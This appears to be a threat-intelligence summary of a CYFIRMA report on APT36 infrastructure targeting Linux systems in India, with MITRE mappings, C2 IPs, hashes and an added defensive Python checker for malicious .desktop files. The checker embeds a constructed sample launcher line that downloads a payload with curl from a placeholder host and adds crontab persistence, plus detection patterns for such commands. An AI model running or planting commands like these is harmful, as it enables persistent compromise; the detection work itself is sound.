OSINT Analysis: Tracking Malicious Infrastructure Associated with Transparent Tribe – CYFIRMA

CYFIRMA traces the infrastructure tied to the Transparent Tribe (APT36), uncovering Mythic C2 servers and Poseidon binaries used against targets in India. The report highlights Linux-based attack vectors, persistence tricks, and the evolving threat landscape around this group. #TransparentTribe #Poseidon

Key points

  • The investigation tracks Transparent Tribe (APT36) infrastructure and identifies related C2 servers hosted on DigitalOcean.
  • A Twitter tip pointed to two IPs linked to Transparent Tribe’s C2 servers, part of Mythic’s C2 infrastructure.
  • JARM fingerprinting narrowed from about 31,390 servers to 15 hosts tied to Mythic-based activity, potentially targeting India.
  • Malicious Linux desktop entry files disguised as PDFs are used to deploy payloads and establish persistence.
  • APT36 is increasingly targeting Linux environments, including Debian-based OSs in Indian government sectors (BOSS OS, Maya OS).
  • The report provides insights into infrastructure, methods, and tools used by APT36 in a Linux-based attack campaign targeting India.

MITRE Techniques

  • [T1566] Phishing – Used to deliver malicious payloads via phishing emails or malicious websites. Quote: “Possibly the zip archive (Document Details.zip …) containing malicious Linux desktop entry file (Document Details.pdf.desktop …) is distributed either through phishing emails or malicious websites.”
  • [T1059] User Execution – Malicious file and command scripts are executed when the Linux desktop entry runs. Quote: “The Linux desktop entry file is crafted to look like a legitimate PDF document link but actually performs a series of malicious actions upon execution.”
  • [T1547] Boot or Logon Autostart Execution – Persistence via scheduling mechanisms. Quote: “manipulates the crontab (a Linux scheduling tool) to ensure persistence.”
  • [T1027] Obfuscated Files or Information – Obfuscation to evade detection. Quote: “The Linux desktop entry file size exceeds 1 MB due to the addition of numerous “#” characters, likely an attempt to evade security scans.”
  • [T1564.001] Hide Artifacts: Hidden Files and Directories – Use of a hidden directory for payloads. Quote: “creates a hidden directory (~/.local/share) on the system where it downloads two malicious files.”
  • [T1070.004] Indicator Removal: File Deletion – Attempt to clean up traces. Quote: “Finally, the file attempts to clean up traces of its presence by removing temporary files.”
  • [T1071.001] Application Layer Protocol: Web Protocols – C2 panel accessed over web protocols on port 7443. Quote: “The C2 panel for Mythic Poseidon is accessible via the URI path /new/login on these server IPs at port 7443.”
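Added example, not code from the CYFIRMA report: a small Python triage check that parses a Linux desktop entry and flags the traits quoted above (PDF double extension, inline shell in Exec, downloads into the hidden ~/.local/share directory, crontab changes, temp-file cleanup, and heavy "#" padding). The sample launcher is constructed for this example, its URL is a placeholder, and the thresholds are assumptions.

```python
import re

# Constructed sample modelled on the behaviours the report describes (the URL is a
# placeholder and the commands are illustrative, not the real file's contents).
SAMPLE_DESKTOP_ENTRY = (
    "[Desktop Entry]\n"
    "Type=Application\n"
    "Name=Document Details.pdf\n"
    "Icon=application-pdf\n"
    "Terminal=false\n"
    'Exec=bash -c "mkdir -p ~/.local/share && '
    "curl -s http://C2-PLACEHOLDER.invalid/stage -o ~/.local/share/.svc && "
    "(crontab -l; echo '@reboot ~/.local/share/.svc') | crontab - && "
    'rm -f /tmp/*.tmp"\n'
    + "#" * 4000 + "\n"  # '#' padding, like the >1 MB file the report describes
)

# Regexes applied to the Exec= value, each paired with the finding it produces.
EXEC_CHECKS = [
    (r"\b(bash|sh)\s+-c\b", "Exec runs an inline shell command (T1059)"),
    (r"\b(curl|wget)\b", "Exec downloads a payload with curl/wget"),
    (r"(~|\$HOME)/\.local/share", "Exec stages files under hidden ~/.local/share (T1564.001)"),
    (r"\bcrontab\b", "Exec modifies crontab for persistence"),
    (r"\brm\s+-r?f\b", "Exec deletes temporary files (T1070.004)"),
]


def parse_desktop_entry(text):
    """Return key=value pairs of a .desktop file, skipping comments and group headers."""
    fields = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("["):
            continue
        key, sep, value = line.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def padding_ratio(text):
    """Fraction of the file made of '#' characters; real launchers are small and rarely commented."""
    return text.count("#") / max(len(text), 1)


def analyze_desktop_entry(filename, text):
    """Return a list of suspicious traits; an empty list means nothing matched."""
    findings = []
    if filename.lower().endswith(".pdf.desktop"):
        findings.append("double extension: launcher masquerading as a PDF")
    exec_line = parse_desktop_entry(text).get("Exec", "")
    findings += [msg for pat, msg in EXEC_CHECKS if re.search(pat, exec_line)]
    if padding_ratio(text) > 0.5:  # assumed threshold; 1 MB of '#' gives ~1.0
        findings.append("file is mostly '#' padding, likely scan evasion (T1027)")
    return findings
```

Running it over `~/.local/share/applications` and any `*.desktop` extracted from incoming archives turns the report's quoted behaviours into a repeatable check rather than a one-off hash match.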

Indicators of Compromise

  • [IP] C2-Malicious Infrastructure – 143.198.64.151, 165.232.118.207, and 14 more IPs
  • [MD5 Hash] Poseidon binaries – 242f77b4e65671a55e103b8b26df46a7, 9d0f1c7825a207a2ad4acd0c9fece794, and 7 more hashes
  • [File Name] Linux Desktop Entry File – Document Details.pdf.desktop (md5: e354cf4cc4177e019ad236f8b241ba3c)
  • [MD5 Hash] Zip Archive – Document Details.zip (md5: 01d9e52a4b38beb6541c5d3cae265a26)

Read more: https://www.cyfirma.com/research/osint-investigation-hunting-malicious-infrastructure-linked-to-transparent-tribe/